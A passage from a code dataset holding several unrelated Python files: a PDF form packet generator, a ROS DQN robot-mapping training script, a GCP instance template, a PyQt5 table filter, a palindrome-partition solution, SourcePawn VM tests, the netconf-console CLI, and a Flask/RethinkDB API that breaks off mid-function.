shutil.rmtree(packet_output_folder)\n os.makedirs(packet_output_folder)\n\n PacketFactory.generate_form(CR180Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(CR181Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(POS040Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(FW001Model, ph, event, packet_output_folder, resources_directory)\n PacketFactory.generate_form(FW003Model, ph, event, packet_output_folder, resources_directory)\n\n @staticmethod\n def generate_form(form_model, ph, event, packet_output_folder, resources_directory): # ==> saves PDF\n \"\"\"\n :type form_model: FormModel\n \"\"\"\n fields_list = form_model.get_fields(ph, event)\n form_filler = FormFiller(form_model.get_name(), resources_directory)\n json_list = form_filler.get_fields()\n json_list = FormUtil.fill_field_json_with_field_list(json_list, fields_list)\n output_path = os.path.join(packet_output_folder, form_model.get_output_file_name())\n form_filler.fill(json_list, output_path)\n","sub_path":"record_expungement_webapp/packet_factory.py","file_name":"packet_factory.py","file_ext":"py","file_size_in_byte":1807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"444734997","text":"#!/usr/bin/env python\n\nfrom shutil import copyfile\nimport sys\nimport errno\nimport os\nfrom datetime import datetime\nimport gym\nimport numpy\nimport time\nfrom gym import wrappers\n\n# ROS packages required\nimport rospy\nimport rospkg\nfrom openai_ros.openai_ros_common import StartOpenAI_ROS_Environment\n\n# DQN\nimport dqn\nimport numpy as np\n\nVS_ROS_DEBUG = 0\nENVS = ['TurtleBot3WorldMapping2RobotsTB3World-v0', 'TurtleBot3WorldMapping2RobotsHouse1-v0', 'TurtleBot3WorldMapping2RobotsHouse2-v0']\nEPISODES = 200\n\nENV_VALUES = ['dev-no-gazebo', 'dev-gazebo', 'deploy']\n\ndef create_dir(path):\n try:\n os.makedirs(os.path.dirname(path))\n except OSError as exc: # Guard against race condition\n if exc.errno != errno.EEXIST:\n raise\n\ndef train(environment):\n \"\"\"DQN agent implementation based from https://github.com/keon/deep-q-learning/blob/master/dqn.py\n \"\"\"\n\n if VS_ROS_DEBUG:\n sys.stderr.write(\"Waiting for VS ROS debugger to be attached... Press a key and ENTER once it has been attached: \")\n raw_input()\n\n ### Export ENV variables BEGIN\n \n # Add node name to ROS logging messages \n os.environ['ROSCONSOLE_FORMAT']='[${severity}] [${time}]: ${node}: ${message}'\n \n # Set TB3 model\n os.environ['TURTLEBOT3_MODEL'] = 'burger'\n\n # Set ENV variable\n if os.environ.get('ENV') is None:\n os.environ['ENV'] = ENV_VALUES[0]\n\n assert os.environ.get('ENV') in ENV_VALUES, \"The ENV variable is not one of the allowable values: \" + ','.join(ENV_VALUES)\n\n # Set WS path if no env variable is set\n if os.environ.get('ROS_WS') is None:\n os.environ['ROS_WS'] = '/home/jazz/Projects/FEUP/ProDEI/feup-ri/assign3-4/catkin_ws'\n \n ### Export ENV variables END\n\n rospy.init_node('turtlebot3_world_mapping_dqn', anonymous=True, log_level=rospy.WARN)\n\n # Init OpenAI_ROS ENV\n task_and_robot_environment_name = environment\n env = StartOpenAI_ROS_Environment(task_and_robot_environment_name)\n\n # Save starting time\n now = datetime.now()\n current_time = now.strftime(\"%Y-%m-%d-%H-%M-%S\")\n \n # MAKE SURE TO USE loginfo INSTEAD OF logdebug! \n # logdebug doesn't appear in \\rosout for some reason (check rospy API), therefore it won't appear in rosconsole.\n # Create the Gym environment\n rospy.loginfo(\"Gym environment done\")\n rospy.loginfo(\"Starting Learning\")\n\n # Set the logging system\n rospack = rospkg.RosPack()\n pkg_path = rospack.get_path('coop_mapping')\n\n results_dir = os.environ['ROS_WS']+ os.path.sep + 'trainings' + os.path.sep + 'results' + os.path.sep + \"{}-dqn\".format(current_time)\n create_dir(results_dir)\n\n training_weights_file = os.environ['ROS_WS'] + os.path.sep + 'trainings' + os.path.sep + 'weights' + os.path.sep + \"{}-dqn_{}_weights.h5f\".format(current_time, environment)\n create_dir(training_weights_file)\n\n env = wrappers.Monitor(env, results_dir, force=True)\n rospy.loginfo(\"Monitor Wrapper started\")\n\n # Next, we build a very simple model.\n state_size = env.observation_space.shape[0]\n action_size = env.action_space.n\n agent = dqn.DQNAgent(state_size, action_size)\n # agent.load(\"./save/cartpole-dqn.h5\")\n done = False\n batch_size = 32\n\n for e in range(EPISODES):\n state = env.reset()\n state = np.reshape(state, [1, state_size])\n rospy.logwarn(\"Initial state ==> {}\".format(state))\n while True:\n # env.render()\n action = agent.act(state)\n next_state, reward, done, _ = env.step(action)\n rospy.logwarn(\"Action taken ==> {}\".format(action))\n\n next_state = np.reshape(next_state, [1, state_size])\n agent.memorize(state, action, reward, next_state, done)\n state = next_state\n rospy.logwarn(\"After taking action (s, r, d) ==> {}; {}; {}\".format(state, reward, done))\n\n if done:\n break\n\n if len(agent.memory) > batch_size:\n agent.replay(batch_size)\n\n if e % 10 == 0: # save weights every 10 episodes\n agent.save(training_weights_file)\n \n # Copy final map file to have a way of getting robot performance without being writing to file\n copyfile(\"/tmp/ros_merge_map.pgm\", results_dir + os.path.sep + \"final-map-episode-{}.pgm\".format(e))\n\n env.close()\n \nif __name__ == '__main__':\n train(ENVS[0])\n # train(ENVS[1])","sub_path":"assign3-4/catkin_ws/src/internal-packages/coop_mapping/scripts/start_training_2_robots_dqn.py","file_name":"start_training_2_robots_dqn.py","file_ext":"py","file_size_in_byte":4416,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"506367045","text":"from helpers import concat_names, global_compute_url, zonal_compute_url\n\nclass Instance:\n\n def __init__(self, context, vpc, instance_name, meta_key, meta_value):\n self.vpc = vpc\n self.context = context\n self.meta_key = meta_key\n self.meta_value = meta_value\n self.instance_name = concat_names(\n [context.env['deployment'], context.env['name'], instance_name])\n\n def create_instance(self):\n\n instance = {\n \"zone\": self.context.properties[\"zone\"],\n \"machineType\": zonal_compute_url(self.context.env[\"project\"],\n self.context.properties[\"zone\"],\n \"machineTypes\",\n self.context.properties['instanceType']),\n \"metadata\": {\n \"items\": [{\n \"key\": self.meta_key,\n \"value\": self.context.imports[\n self.context.properties[self.meta_value]],\n }]\n },\n \"disks\": [{\n \"deviceName\": \"boot\",\n \"type\": \"PERSISTENT\",\n \"autoDelete\": True,\n \"boot\": True,\n \"initializeParams\": {\n \"diskName\": self.instance_name + \"-disk\",\n \"diskSizeGb\": self.context.properties['diskSize'],\n \"sourceImage\": global_compute_url(self.context.properties[\"instanceProject\"],\n \"images\",\n self.context.properties[\"instanceImage\"])\n },\n }],\n \"networkInterfaces\": [{\n \"accessConfigs\": [{\n \"name\": \"external-nat\",\n \"type\": \"ONE_TO_ONE_NAT\"\n }],\n \"network\": self.vpc\n }],\n \"serviceAccounts\": [{\n \"email\": \"default\",\n \"scopes\": [\n \"https://www.googleapis.com/auth/logging.write\",\n \"https://www.googleapis.com/auth/monitoring.write\",\n \"https://www.googleapis.com/auth/devstorage.full_control\"\n ]\n }]\n }\n\n resource = {\n \"name\": self.instance_name,\n \"type\": \"compute.v1.instance\",\n \"properties\": instance\n }\n\n return resource\n","sub_path":"instance.py","file_name":"instance.py","file_ext":"py","file_size_in_byte":2462,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"3956887","text":"from PyQt5 import QtWidgets, QtCore, QtGui\nfrom PyQt5.QtWidgets import QTabWidget, QDockWidget, QTableView, QHeaderView, QTableWidget, QMessageBox, QAbstractItemView\nfrom PyQt5.QtGui import QStandardItemModel, QStandardItem, QBrush\nfrom PyQt5.QtCore import Qt\n\nclass myWindow(QtWidgets.QMainWindow):\n def __init__(self, parent=None):\n super(myWindow, self).__init__(parent)\n self.centralwidget = QtWidgets.QWidget(self)\n self.lineEdit = QtWidgets.QLineEdit(self.centralwidget)\n self.view = QtWidgets.QTableView(self.centralwidget)\n self.label = QtWidgets.QLabel(self)\n\n self.gridLayout = QtWidgets.QGridLayout(self.centralwidget)\n self.gridLayout.addWidget(self.lineEdit, 0, 1, 1, 1)\n self.gridLayout.addWidget(self.view, 1, 0, 1, 3)\n self.gridLayout.addWidget(self.label, 0, 0, 1, 1)\n\n self.setCentralWidget(self.centralwidget)\n\n self.model = QStandardItemModel(self)\n\n for rowName in range(3 * 5):\n self.model.invisibleRootItem().appendRow(\n [ QtGui.QStandardItem(\"row {0} col 1\".format(rowName)) \n for column in range(3)\n ]\n )\n\n self.proxy = QtCore.QSortFilterProxyModel(self)\n self.proxy.setSourceModel(self.model)\n\n self.view.setModel(self.proxy)\n\n # self.comboBox.currentIndexChanged.connect(self.on_comboBox_currentIndexChanged)\n\n self.horizontalHeader = self.view.horizontalHeader()\n self.horizontalHeader.sectionClicked.connect(self.on_view_horizontalHeader_sectionClicked)\n\n @QtCore.pyqtSlot(int)\n def on_view_horizontalHeader_sectionClicked(self, logicalIndex):\n self.logicalIndex = logicalIndex\n self.on_comboBox_currentIndexChanged(self.logicalIndex)\n menuName = '_' + str(logicalIndex) + 'Menu'\n if not hasattr(self, menuName):\n setattr(self, menuName, QtWidgets.QMenu(self))\n self.menuValues = getattr(self, menuName)\n menuEdit = QtWidgets.QLineEdit()\n inputAction = QtWidgets.QWidgetAction(self.menuValues)\n inputAction.setDefaultWidget(menuEdit)\n self.menuValues.addAction(inputAction)\n menuEdit.textChanged.connect(self.on_lineEdit_textChanged)\n\n self.menuValues = getattr(self, menuName)\n self.romoveAction(self.menuValues) \n\n self.signalMapper = QtCore.QSignalMapper(self) \n self.menuValues.mouseReleaseEvent = self._menu_mouseReleaseEvent\n\n actionAll = QtWidgets.QAction(\"All\", self)\n actionAll.triggered.connect(self.on_actionAll_triggered)\n actionAll.setProperty('canHide', True)\n actionAll.setCheckable(True)\n self.menuValues.addAction(actionAll)\n self.menuValues.addSeparator()\n\n valuesUnique = [self.proxy.data(self.proxy.index(row, self.logicalIndex))\n for row in range(self.proxy.rowCount())\n ]\n for actionNumber, actionName in enumerate(sorted(list(set(valuesUnique)))): \n action = QtWidgets.QAction(actionName, self)\n self.signalMapper.setMapping(action, actionNumber) \n action.triggered.connect(self.signalMapper.map) \n action.setCheckable(True) \n self.menuValues.addAction(action)\n\n self.signalMapper.mapped.connect(self.on_signalMapper_mapped) \n\n headerPos = self.view.mapToGlobal(self.horizontalHeader.pos()) \n\n posY = headerPos.y() + self.horizontalHeader.height()\n posX = headerPos.x() + self.horizontalHeader.sectionPosition(self.logicalIndex)\n getattr(self, menuName).exec_(QtCore.QPoint(posX, posY))\n\n @QtCore.pyqtSlot()\n def on_actionAll_triggered(self):\n \t# 显示全部\n filterColumn = self.logicalIndex\n filterString = QtCore.QRegExp( \"\",\n QtCore.Qt.CaseInsensitive,\n QtCore.QRegExp.RegExp\n )\n\n self.proxy.setFilterRegExp(filterString)\n self.proxy.setFilterKeyColumn(filterColumn)\n\n @QtCore.pyqtSlot(int)\n def on_signalMapper_mapped(self, i):\n # stringAction = self.signalMapper.mapping(i).text()\n stringActions = '|'.join([x.text() for x in getattr(self, '_' + str(self.logicalIndex) + 'Menu').actions() if x.isChecked()])\n filterColumn = self.logicalIndex\n print(stringActions)\n filterString = QtCore.QRegExp( stringActions,\n QtCore.Qt.CaseSensitive,\n # QtCore.QRegExp.FixedString\n )\n self.proxy.setFilterRegExp(filterString)\n self.proxy.setFilterKeyColumn(filterColumn)\n\n @QtCore.pyqtSlot(str)\n def on_lineEdit_textChanged(self, text):\n # 搜索框文字变化函数\n search = QtCore.QRegExp( text,\n QtCore.Qt.CaseInsensitive,\n QtCore.QRegExp.RegExp\n )\n\n self.proxy.setFilterRegExp(search)\n\n @QtCore.pyqtSlot(int)\n def on_comboBox_currentIndexChanged(self, index):\n self.proxy.setFilterKeyColumn(index)\n\n def _menu_mouseReleaseEvent(self, event):\n action = self.menuValues.actionAt(event.pos())\n if not action:\n # 没有找到action就交给QMenu自己处理\n return QtWidgets.QMenu.mouseReleaseEvent(self.menuValues, event)\n if action.property('canHide'): # 如果有该属性则给菜单自己处理\n return QtWidgets.QMenu.mouseReleaseEvent(self.menuValues, event)\n # 找到了QAction则只触发Action\n action.activate(action.Trigger)\n\n def romoveAction(self, menu):\n \t# 删除输入框之外的按钮1\n for action in menu.actions():\n if type(action) != QtWidgets.QWidgetAction:\n menu.removeAction(action)\n\n # def _checkAction(self):\n # # 三个action都响应该函数\n # self.labelInfo.setText('\\n'.join(['{}\\t选中:{}'.format(\n # action.text(), action.isChecked()) for action in self.menuValues.actions()]))\n\nif __name__ == \"__main__\":\n import sys\n app = QtWidgets.QApplication(sys.argv)\n main = myWindow()\n main.show()\n main.resize(400, 600)\n sys.exit(app.exec_())","sub_path":"FtTest.py","file_name":"FtTest.py","file_ext":"py","file_size_in_byte":6457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"360654140","text":"class Solution(object):\n def minCut(self, s):\n \"\"\"\n :type s: str\n :rtype: int\n \"\"\"\n if not any(s):\n return 0\n A = [-1 for _ in range(len(s)+1)]\n A[0] = -1\n min_cut = []\n for i in range(len(s)):\n min_cut = []\n for j in range(i):\n if s[j:i+1] == s[j:i+1][::-1]:\n min_cut.append(A[j]+1)\n if len(min_cut) > 0:\n A[i+1] = min(min(min_cut), A[i] + 1)\n if A[i+1] == -1:\n A[i+1] = A[i] + 1\n\n return A[-1]\n\n\nS = Solution()\nprint(S.minCut('aabbaaaa'))","sub_path":"132 - Palindrome Partitioning II.py","file_name":"132 - Palindrome Partitioning II.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"58312660","text":"import pytest\n\nimport smx.compiler\n\n\n@pytest.fixture(scope='session')\ndef compile():\n def compile(code, **options):\n # TODO: auto-insert #include and default Plugin:myinfo\n plugin = smx.compiler.compile(code)\n plugin.runtime.amx.print_verification = False\n return plugin\n return compile\n\n\n@pytest.mark.parametrize('value', [True, False])\ndef test_bool_literal_return(value, compile):\n plugin = compile('''\n public bool:Test() {\n return %s;\n }\n ''' % ('true' if value else 'false'))\n rval = plugin.runtime.call_function_by_name('Test')\n assert rval is value\n\n\n@pytest.mark.parametrize('integer', [\n 0,\n 1,\n 2147483647,\n -2147483648,\n])\ndef test_integer_literal_return(integer, compile):\n plugin = compile('''\n public Test() {\n return %d;\n }\n ''' % integer)\n assert plugin.runtime.call_function_by_name('Test') == integer\n\n\ndef test_float_literal_return(compile):\n plugin = compile('''\n public Float:Test() {\n return 12.0;\n }\n ''')\n rval = plugin.runtime.call_function_by_name('Test')\n assert rval == 12.0\n assert isinstance(rval, float)\n\n\ndef test_string_return(compile):\n plugin = compile('''\n String:Test() {\n new String:s[] = \"hiss\";\n return s;\n }\n public DontOptimizeOutTest() {\n Test();\n }\n ''')\n rval = plugin.runtime.call_function_by_name('Test')\n assert rval == 'hiss'\n\n\n# @pytest.mark.xfail(reason='rvals from inner calls currently unsupported')\ndef test_interpreter(compile):\n plugin = compile(\"\"\"\n #include \n\n public Plugin:myinfo = {\n name = \"PySMX Test\",\n author = \"theY4Kman\",\n description = \"Test plug-in for the PySMX VM\",\n version = \"0.0\",\n url = \"https://github.com/theY4Kman/pysmx/\"\n };\n\n public OnPluginStart()\n {\n new percent = 100;\n for (new i=0; i<10; i++)\n percent += i;\n\n PrintToServer(\"%s function%c work %d%% (+/- %.3f) of the time! No longer 0x%x -- now we're 0x%X!\", \"Format\", 's', percent, 5.3, 0xdeadbeef, 0xcafed00d);\n Test();\n\n CreateTimer(1.0, Timer_Callback, 5);\n }\n\n Test()\n {\n PrintToServer(\"Called Test()\");\n }\n\n public Action:Timer_Callback(Handle:timer, any:data)\n {\n PrintToServer(\"Timer fired with: %d\", data);\n }\n\n new i_GlobalValue = 1337;\n public ReturnGlobal() {\n return i_GlobalValue;\n }\n\n public ReturnTwentyThree() {\n return ReturnTwentyThreeInner();\n }\n\n ReturnTwentyThreeInner() {\n return 23;\n }\n \"\"\")\n\n # This works\n assert plugin.runtime.call_function_by_name('ReturnTwentyThreeInner') == 23\n\n # But this doesn't\n # assert plugin.runtime.call_function_by_name('ReturnTwentyThree') == 23\n\n\ndef test_convars(compile):\n plugin = compile('''\n new Handle:g_cvar = INVALID_HANDLE;\n public TestCreateConVar() {\n g_cvar = CreateConVar(\"pysmx_num\", \"350\", \"description\");\n }\n public TestGetConVarInt() {\n return GetConVarInt(g_cvar);\n }\n ''')\n\n plugin.runtime.call_function_by_name('TestCreateConVar')\n value = plugin.runtime.call_function_by_name('TestGetConVarInt')\n assert value == 350\n","sub_path":"test/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":3488,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"480746129","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport sys\nimport argparse\nimport readline\nimport getpass\nfrom ncclient import manager, transport\nfrom lxml import etree\nfrom ncclient.operations.rpc import RPCError\nfrom contextlib import contextmanager\nimport six\nimport traceback\nimport re\n\nfrom . import nctransport, completions, operations\n\n\nclass OperationArgAction(argparse.Action):\n def __init__(self, *args, **kwargs):\n self.operation = kwargs[\"const\"]\n super(OperationArgAction, self).__init__(*args, **kwargs)\n\n def __call__(self, parser, ns, values, option_string=None):\n if self.operation.nargs == \"?\":\n values = [] if values == self.operation else [values]\n ns.operations.append((self.operation, values))\n\n\nquoted_rgx = r'\"[^\\\\\"]*(?:\\\\.[^\\\\\"]*)*\"|[^ ]+'\n\n\ndef parse_expr_args(expression):\n expr = \" \" + expression\n spaces = re.compile(\" +\")\n quoted = re.compile(quoted_rgx)\n while expr != \"\":\n spm = spaces.match(expr)\n if spm is None:\n raise ParserException(\"Syntax error before \" + expr.split()[0])\n expm = quoted.match(expr[spm.end():])\n if expm is None:\n raise ParserException(\"Syntax error before \" + expr[spm.end():].split()[0])\n ex = expm.group()\n if ex[0] == '\"':\n yield re.sub(r\"\\\\(.)\", r\"\\1\", ex[1:-1])\n else:\n yield ex\n expr = expr[spm.end() + expm.end():]\n\n\nclass ExpressionOperation(operations.Operation):\n def __init__(self, exprparser, process_errors=True):\n self.exprparser = exprparser\n self.process_errors = process_errors\n\n def invoke(self, mc, ns, expression):\n expression = expression.strip()\n if expression == '':\n return None\n try:\n ns = self.exprparser.parse_args(parse_expr_args(expression),\n namespace=argparse.Namespace(**vars(ns)))\n except ParserException as e:\n print(e, file=sys.stderr)\n return None\n if hasattr(ns, 'cmd_parser') and ns.cmd_parser is not None:\n ns.cmd_parser.print_help()\n return None\n try:\n if hasattr(ns, \"value\"):\n return ns.op.invoke(mc, ns, ns.value)\n else:\n return ns.op.invoke(mc, ns)\n except RPCError as e:\n if self.process_errors:\n return e.xml\n raise\n except Exception as e:\n if self.process_errors:\n report_exception(e, ns.debug)\n return None\n raise\n\n\ndef report_exception(exc, debug=False):\n if debug:\n traceback.print_exc(file=sys.stderr)\n else:\n msg = str(exc)\n if len(msg) > 100:\n msg = msg[:80] + \"...\"\n print('Operation failed: %s - %s' % (exc.__class__.__name__, msg))\n\n\nclass ParserException(Exception):\n pass\n\n\nclass SafeParser(argparse.ArgumentParser):\n def error(self, message):\n raise ParserException(message)\n\n\ndef expression_parser(parsercls=argparse.ArgumentParser, custom_help=False, **kwargs):\n exprparser = parsercls(prog='', **kwargs)\n exprs = exprparser.add_subparsers(help=\"Netconf commands\")\n for opcls in operations.OPERATIONS:\n op = opcls()\n parserargs = dict(parents=[command_options_parser(op)], help=op.help)\n if custom_help:\n parserargs['add_help'] = False\n cmdparser = exprs.add_parser(op.option, **parserargs)\n if custom_help:\n cmdparser.add_argument(\"-h\", \"--help\", action=\"store_const\", const=cmdparser,\n dest=\"cmd_parser\", help=\"show this help message\")\n if op.nargs == 1:\n cmdparser.add_argument(\"value\")\n elif op.nargs == \"?\":\n cmdparser.add_argument(\"value\", nargs=op.nargs)\n cmdparser.set_defaults(op=op)\n return exprparser\n\n\ncommand_option_args = {\n \"style\": ([\"-s\", \"--outputStyle\"],\n dict(dest=\"style\", default=[],\n choices=[\"plain\", \"noaaa\"], nargs=\"*\")),\n \"db\": ([\"--db\"],\n dict(dest=\"db\", default=\"running\",\n help=\"Database for commands that operate on a database.\")),\n \"timeout\": ([\"--timeout\"],\n dict(dest=\"timeout\", default=600, type=int,\n help=\"Confirmed commit timeout (in seconds).\")),\n \"wdefaults\": ([\"--with-defaults\"],\n dict(dest=\"wdefaults\", default=None,\n choices=[\"explicit\", \"trim\", \"report-all\", \"report-all-tagged\"],\n help=\"Use with --get, --get-config, or --copy-config.\")),\n \"winactive\": ([\"--with-inactive\"],\n dict(dest=\"winactive\", action=\"store_true\",\n help=\"Send with-inactive parameter. Use with --get, \"\n \"--get-config, --copy-config, or --edit-config.\")), # FIXME: not supported\n \"xpath\": ([\"-x\", \"--xpath\"],\n dict(dest=\"xpath\",\n help=\"XPath filter to be used with --get, --get-config, \"\n \"and --create-subscription; kept for backward compatibility, \"\n \"the operations accept direct arguments if provided.\")),\n \"test\": (\n [\"-t\", \"--test-option\"],\n dict(dest=\"test\",\n choices=[\"test-then-set\", \"set\", \"test-only\"],\n help=\"Value of test-option used with edit-config (defaults to test-then-set)\")),\n \"operation\": (\n [\"-o\", \"--operation\"],\n dict(dest=\"operation\", default=\"merge\",\n choices=[\"merge\", \"replace\", \"create\"],\n help=\"Value of the operation attribute used with --set.\")),\n \"deloperation\": (\n [\"--del-operation\"],\n dict(dest=\"deloperation\", default=\"remove\",\n choices=[\"remove\", \"delete\"],\n help=\"Value of the operation attribute used with --delete.\"))\n}\n\n\ndef command_options_parser(operation=None):\n cmd_opt_parser = argparse.ArgumentParser(add_help=False)\n cmd_group = cmd_opt_parser.add_argument_group(\"Command options\")\n options = command_option_args.keys() if operation is None else operation.command_opts\n for opt in options:\n args, kws = command_option_args[opt]\n cmd_group.add_argument(*args, **kws)\n return cmd_opt_parser\n\n\ndef argparser():\n parser = argparse.ArgumentParser(prog=\"netconf-console\", parents=[command_options_parser()])\n parser.add_argument(\"-v\", \"--version\", dest=\"version\",\n help=\"force NETCONF version 1.0 or 1.1\") # FIXME: not supported\n parser.add_argument(\"-u\", \"--user\", dest=\"username\", default=\"admin\",\n help=\"username\")\n parser.add_argument(\"-p\", \"--password\", dest=\"password\", default=\"admin\", const=None, nargs=\"?\",\n help=\"password\")\n parser.add_argument(\"--host\", dest=\"host\", default=\"127.0.0.1\",\n help=\"NETCONF agent hostname\")\n parser.add_argument(\"--port\", dest=\"port\", default=2022, type=int,\n help=\"NETCONF agent SSH port\")\n parser.add_argument(\"--privKeyFile\", help=\"File which contains the private key.\")\n parser.add_argument(\"--raw\", type=argparse.FileType(\"w\"), nargs=\"?\", const=sys.stdout)\n parser.add_argument(\"--tcp\", action=\"store_true\"),\n parser.add_argument(\"-N\", \"--ns\", dest=\"ns\",\n help=\"Namespace prefix; useful for get queries with xpath filter.\",\n nargs=\"*\")\n\n parser.add_argument(\"--debug\", action=\"store_true\")\n\n cmds = parser.add_argument_group(\"Commands\")\n parser.set_defaults(operations=[])\n for opcls in operations.OPERATIONS:\n op = opcls()\n cmds.add_argument(\"--%s\" % op.option,\n dest=op.dest,\n nargs=op.nargs,\n action=OperationArgAction,\n const=op,\n choices=op.choices,\n help=op.help)\n\n exprparser = expression_parser()\n parser.add_argument(\"-e\", \"--expr\",\n action=OperationArgAction,\n nargs=1,\n const=ExpressionOperation(exprparser))\n parser.add_argument(\"--dry\", action=\"store_true\", default=False,\n help=\"Do not send anything, return the RPC to be sent (debugging only).\")\n parser.add_argument(\"--interactive\", \"-i\", action=\"store_true\",\n help=\"Run the console interactively (do not use with commands).\")\n parser.add_argument(\"filename\",\n nargs=\"?\",\n help=\"Filename (or '-') containing v1.0-delimited list of NETCONF RPCs. \"\n \"Retained for backward compatibility, it is suggested to use \"\n \"a sequence of --get, --set, etc. commands instead. \"\n \"Cannot be combined with other commands.\")\n return parser\n\n\nclass SSHSession(transport.SSHSession):\n def __init__(self, device_handler, raw_file):\n self.raw_file = raw_file\n super(SSHSession, self).__init__(device_handler)\n self.last_pos = 0\n\n def _parse10(self):\n with self.raw_processing(self._parsing_pos10):\n super(SSHSession, self)._parse10()\n\n def _parse11(self):\n with self.raw_processing(self._parsing_pos11):\n super(SSHSession, self)._parse11()\n\n @contextmanager\n def raw_processing(self, position):\n if self.raw_file is not None:\n self.raw_file.write(self._buffer.getvalue()[self.last_pos:].decode(\"utf8\"))\n try:\n yield\n finally:\n self.last_pos = self._buffer.tell()\n\n\ndef connect(ns):\n password = ns.password\n if password is None:\n password = getpass.getpass()\n connect_args = dict(host=ns.host, port=ns.port,\n username=ns.username, password=password,\n key_filename=ns.privKeyFile,\n hostkey_verify=False, look_for_keys=False, allow_agent=False)\n device_handler = manager.make_device_handler(None)\n if not ns.tcp and not ns.raw:\n # use the public API only\n session = transport.SSHSession(device_handler)\n elif ns.tcp:\n session = nctransport.TCPSession(device_handler, ns.raw)\n else:\n session = nctransport.SSHSession(device_handler, ns.raw)\n if not ns.tcp and (\"hostkey_verify\" not in connect_args or connect_args[\"hostkey_verify\"]):\n session.load_known_hosts()\n try:\n session.connect(**connect_args)\n except Exception:\n if session.transport:\n session.close()\n raise\n return manager.Manager(session, device_handler, **connect_args)\n\n\ndef interactive_data():\n readline.parse_and_bind(\"tab: complete\")\n readline.set_completer_delims(\" \")\n readline.set_completer(completions.NCCompleter(operations.OPERATION_OPTS,\n command_option_args))\n try:\n while True:\n command = six.moves.input('netconf> ')\n yield command\n except EOFError:\n return\n\n\ndef interactive_operations(exprparser, mc):\n if sys.stdin.isatty():\n data = interactive_data()\n else:\n data = sys.stdin\n operation = ExpressionOperation(exprparser)\n for command in data:\n if not mc.connected:\n return\n yield (operation, [command])\n return\n\n\ndef connect_and_process(ns):\n with connect(ns) as mc:\n try:\n if ns.filename:\n operations_iter = operations.FilenameOperations(ns.filename).operations()\n elif ns.interactive:\n expr_parser = expression_parser(SafeParser, custom_help=True)\n expr_parser.set_defaults(debug=ns.debug)\n operations_iter = interactive_operations(expr_parser, mc)\n else:\n operations_iter = ns.operations\n for (operation, args) in operations_iter:\n reply = operation.invoke(mc, ns, *args)\n if reply is not None:\n print(etree.tostring(reply, encoding=six.text_type,\n pretty_print=(\"plain\" not in ns.style)))\n except RPCError as e:\n print(etree.tostring(e.xml, encoding=six.text_type, pretty_print=True))\n return -1\n return 0\n\n\ndef main():\n parser = argparser()\n ns = parser.parse_args(sys.argv[1:])\n if ns.operations == [] and ns.filename is None:\n ns.interactive = True\n if ns.interactive and ns.operations != [] or \\\n ns.interactive and ns.filename is not None or \\\n ns.operations != [] and ns.filename is not None:\n parser.print_help()\n return 1\n if ns.dry:\n operations.run_rpc_dry()\n try:\n return connect_and_process(ns)\n except Exception as e:\n report_exception(e, ns.debug)\n return -1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","sub_path":"netconf-console-1.1.1/ncc/ncc.py","file_name":"ncc.py","file_ext":"py","file_size_in_byte":13031,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"60"} +{"seq_id":"193836657","text":"from flask import Flask\nfrom flask import request, g, abort\nimport rethinkdb as r\nfrom rethinkdb.errors import RqlRuntimeError, RqlDriverError\n\nimport json\nfrom configs import RDB_HOST, RDB_PORT, TODO_DB, codes\n\napplication = Flask(__name__)\n\n\ndef add_to_log(*args):\n print('\\n'.join([str(arg) for arg in args]))\n\n\n# db setup; only run once\ndef dbSetup():\n connection = r.connect(host=RDB_HOST, port=RDB_PORT)\n try:\n r.db_create(TODO_DB).run(connection)\n r.db(TODO_DB).table_create('users').run(connection)\n r.db(TODO_DB).table_create('interests').run(connection)\n print('Database setup completed')\n except RqlRuntimeError:\n print('Database already exists.')\n finally:\n connection.close()\ndbSetup()\n\n# open connection before each request\n@application.before_request\ndef before_request():\n try:\n g.rdb_conn = r.connect(host=RDB_HOST, port=RDB_PORT, db=TODO_DB)\n except RqlDriverError:\n abort(503, \"Database connection could be established.\")\n\n\n# close the connection after each request\n@application.teardown_request\ndef teardown_request(exception):\n try:\n g.rdb_conn.close()\n except AttributeError:\n pass\n\n\n@application.route('/registration', methods=['POST'])\ndef create_user():\n data = request.get_json()\n\n if user_exists(data['email']):\n return 'User already exists'\n else:\n try:\n r.table('users').insert(data).run(g.rdb_conn)\n except Exception as e:\n add_to_log('error during create user', e)\n return 'User created', 201\n\n\n@application.route('/statistics')\ndef get_statistic():\n \"\"\"Returns the interests of all users\"\"\"\n try:\n data = r.table('interests').run(g.rdb_conn)\n except Exception as e:\n add_to_log('error during get statistic', e)\n return e, 500\n else:\n results = []\n for i in data.items:\n results.append(i['interests'])\n return json.dumps(results)\n\n\n@application.route('/interests', methods=['POST'])\ndef data_processing():\n \"\"\"Getting data into json to store in the database\"\"\"\n data = request.get_json()\n user_id = request_verification(data)\n\n if isinstance(user_id, int):\n return codes[user_id], user_id\n else:\n interest = {\n 'user_id': user_id,\n 'interests': data['interests']\n }\n try:\n r.table('interests').insert(interest).run(g.rdb_conn)\n except Exception as e:\n add_to_log(e)\n return e, 500\n else:\n return 'The record is created', 201\n\n\n@application.route('/profile', methods=['POST'])\ndef get_user_interests():\n \"\"\"Returns the user's interests\"\"\"\n data = request_verification(request.get_json())\n if isinstance(data, int):\n return codes[data], data\n else:\n try:\n user_data = r.table('interests').filter(r.row['user_id'] == data).run(g.rdb_conn)\n except Exception as e:\n return e, 500\n else:\n interests = user_data.items[0].get('interests')\n return json.dumps(interests), 200\n\n\n# helper functions\ndef user_exists(email):\n user_in_db = r.table('users').filter(r.row['email'] == email).run(g.rdb_conn)\n if user_in_db.items:\n return True\n else:\n return False\n\n\ndef 